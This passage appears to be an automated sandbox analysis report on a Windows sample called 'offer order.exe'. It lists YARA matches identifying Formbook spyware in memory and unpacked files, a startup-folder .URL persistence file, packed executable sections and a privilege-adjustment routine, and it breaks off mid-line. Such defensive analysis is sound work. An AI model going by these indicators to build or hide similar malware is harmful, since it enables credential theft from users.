          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
          Source: 0000000C.00000002.359244107.0000000001820000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.359244107.0000000001820000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000001A.00000002.358304950.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000001A.00000002.358304950.00000000001D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.359207981.00000000017F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.359207981.00000000017F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000002.343417017.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000002.343417017.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000002.344627421.0000000001710000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000002.344627421.0000000001710000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.356195697.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.356195697.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000016.00000002.344721716.0000000001740000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000016.00000002.344721716.0000000001740000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.494578696.0000000002BC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.494578696.0000000002BC0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.492758749.0000000000B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.492758749.0000000000B30000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.491918579.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.491918579.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lpremove.url, type: DROPPEDMatched rule: Methodology_Suspicious_Shortcut_Local_URL author = @itsreallynick (Nick Carr), @QW5kcmV3 (Andrew Thompson), description = Detects local script usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
          Source: 22.2.igfxCUIService.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 22.2.igfxCUIService.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 22.2.igfxCUIService.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 22.2.igfxCUIService.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 12.2.offer order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 12.2.offer order.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 12.2.offer order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 12.2.offer order.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: offer order.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: igfxCUIService.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: offer ordermgr.exe.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.998889661815
          Source: igfxCUIServicemgr.exe.6.drStatic PE information: Section: UPX1 ZLIB complexity 0.998889661815
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/15@2/2
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00E2A2D5 GetLastError,FormatMessageW,12_2_00E2A2D5
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00E18713 AdjustTokenPrivileges,CloseHandle,12_2_00E18713
          Source: C:\Users\user\Desktop\offer order.exeCode function: 12_2_00E18CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,